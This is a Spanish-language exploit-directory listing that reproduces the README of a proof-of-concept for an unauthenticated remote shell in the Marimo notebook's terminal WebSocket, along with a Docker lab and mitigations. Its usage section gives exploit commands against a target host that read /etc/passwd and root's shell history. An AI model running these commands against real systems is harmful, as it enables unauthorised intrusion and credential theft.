Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39987-marimo-rce — CVE-2026-39987 | Kitploit
Herramientas/GitHubGitHub/0xdeadroot/cve-2026-39987-marimo-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHub0xdeadroot/cve-2026-39987-marimo-rce

CVE-2026-39987-marimo-rce

CVE-2026-39987

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-39987 - RCE sin autenticación en Marimo

Ejecución Remota de Código no autenticada en Marimo a través del Terminal WebSocket

Critical Python Docker


📌 Resumen

CVE-2026-39987 es una vulnerabilidad crítica de Ejecución Remota de Código sin autenticación previa que afecta a versiones de Marimo anteriores a la 0.23.0. El endpoint WebSocket /terminal/ws omite completamente la autenticación, permitiendo que cualquier atacante no autenticado obtenga un shell PTY interactivo completo con los privilegios del proceso de Marimo (típicamente root en entornos Docker).


🛠️ Detalles de la vulnerabilidad

  • CVE ID: CVE-2026-39987
  • Producto afectado: Marimo (Cuaderno Python Reactivo)
  • Versiones afectadas: marimo < 0.23.0
  • Versión corregida:
Descargar herramienta
marimo >= 0.23.0
  • Vector de ataque: Red (Sin autenticación)
  • Endpoint afectado: /terminal/ws
  • Impacto: Shell remoto completo (PTY) como root

  • ✨ Características del PoC

    • Conversión automática de http:// a ws:// y de https:// a wss://
    • Vaciado inteligente del buffer PTY
    • Ejecución confiable de comandos
    • Código limpio, mínimo y estable
    • Listo para pruebas en laboratorio Docker

    📁 Estructura del repositorio

    root@kitploit:~
    CVE-2026-39987/
    ├── CVE-2026-39987-poc.py          ← Main Exploit
    ├── docker-vulnerable/
    │   ├── Dockerfile
    │   └── docker-compose.yml
    ├── notebooks/                     ← Persistent notebooks (optional)
    ├── README.md
    └── LICENSE
    

    🚀 Uso

    1. Instalar dependencia

    root@kitploit:~
    pip install websocket-client
    

    2. Ejecutar el exploit

    root@kitploit:~
    # Basic usage
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && hostname"
    
    # System enumeration
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && cat /etc/os-release && ls -la /app"
    
    # Read sensitive files
    python3 CVE-2026-39987-poc.py http://target:2718 "cat /etc/passwd && cat /root/.bash_history"
    

    🧪 Laboratorio Docker vulnerable

    root@kitploit:~
    cd docker-vulnerable
    docker compose up --build -d
    

    Luego, prueba:

    root@kitploit:~
    python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami"
    

    🛡️ Mitigación

    • Actualizar inmediatamente a marimo >= 0.23.0
    • No exponer Marimo directamente a internet
    • Colocar detrás de un proxy inverso con autenticación
    • Ejecutar como usuario no root siempre que sea posible
    • Restringir el acceso a /terminal/ws mediante reglas de firewall o proxy

    ⚠️ Aviso legal

    Esta Prueba de Concepto está destinada únicamente a fines educativos y pruebas de seguridad autorizadas. El autor no se hace responsable por cualquier uso indebido o daño causado por esta herramienta. Asegúrese de tener permiso explícito antes de probar cualquier sistema.

    Úsela de manera ética y responsable.


    📄 Referencias

    • Aviso oficial de CVE
    • Repositorio de Marimo en GitHub
    • Entrada NVD (CVE-2026-39987)

    Hecho para investigación en seguridad y divulgación responsable.